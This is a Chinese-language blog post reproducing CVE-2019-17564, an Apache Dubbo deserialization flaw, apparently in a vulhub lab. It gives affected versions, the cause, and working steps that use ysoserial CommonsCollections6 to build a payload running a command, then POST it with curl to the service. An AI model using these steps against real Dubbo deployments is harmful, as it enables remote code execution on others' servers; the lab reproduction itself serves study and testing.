CVE-2019-17564Apache Dubbo反序列化漏洞

漏洞环境

访问环境状态码500

影响版本

Apache Dubbo >=2.7.0,<= 2.7.4、Apache Dubbo 2.5.*、Apache Dubbo >=2.6.0,<= 2.6.7

漏洞描述

Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞

漏洞复现

首先通过zookeeper自带的zkCli建立一个交互式的shell来确定RPC接口的名称zookeeper下载地址

https://archive.apache.org/dist/zookeeper/zookeeper-3.3.3/zookeeper-3.3.3.tar.gz

解压后用执行bin目录下的zkCli.sh

./zkCli.sh -server your-ip:2181

通过ysoserial中的CommonsCollections6反序列化工具生成payload,ysoserial下载地址

https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar

在kali的桌面打开终端

依次执行这条命令
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections6 "touch /tmp/ssssbbbb" > sb.out

curl -XPOST --data-binary @sb.out http://192.168.xxx/xxx:8080/org.vulhub.api.CalcService

去靶机进行查看

有个小坑
踩坑在靶机执行这条命令

docker exec -it  (docker ps -a 相应服务的 前三位)  /bin/bash

列子

posted @ 2022-05-21 14:30  流浪的情郎  阅读(94)  评论(0)    收藏  举报